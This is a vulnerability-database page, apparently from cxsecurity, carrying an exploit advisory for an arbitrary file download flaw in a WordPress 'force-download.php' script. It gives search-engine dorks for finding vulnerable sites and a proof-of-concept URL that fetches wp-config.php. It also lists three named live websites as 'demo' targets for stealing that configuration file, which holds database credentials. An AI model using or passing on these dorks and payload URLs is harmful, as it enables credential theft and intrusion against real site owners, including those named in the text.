Wordpress force download Arbitrary File Download

2016-08-07 / 2016-08-08
mr xBADGIRL21 (MR) mr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/_____/_/ _____/ ____|___|_| ______|_____|_| # ###################### # Exploit Title : Wordpress force download Arbitrary File Download # Dork 1 : inurl:force-download.php?file=wp-content/uploads # Dork 2 : inurl:wp-content/uploads inurl:force-download.php?file= # Vendor Homepage : http://elouai.com/force-download.php # Tested on: [ BACKBOX] # skype:xbadgirl21 # Date: 07/08/2016 # video Proof : https://www.youtube.com/watch?v=V3o_17be8zY ###################### # PoC ###################### # [+] Using `force-download.php` file from `Wordpress websites we can download any file. # # [!] http://localhost/force-download.php?file=wp-config.php # ###################### # Live Demo ###################### # [!] https://www.quantumib.com/force-download.php?file=wp-config.php # [!] https://help.jin-soku.biz/force-download.php?file=wp-config.php # [!] http://www.globalvoip.ca/force-download.php?file=wp-config.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top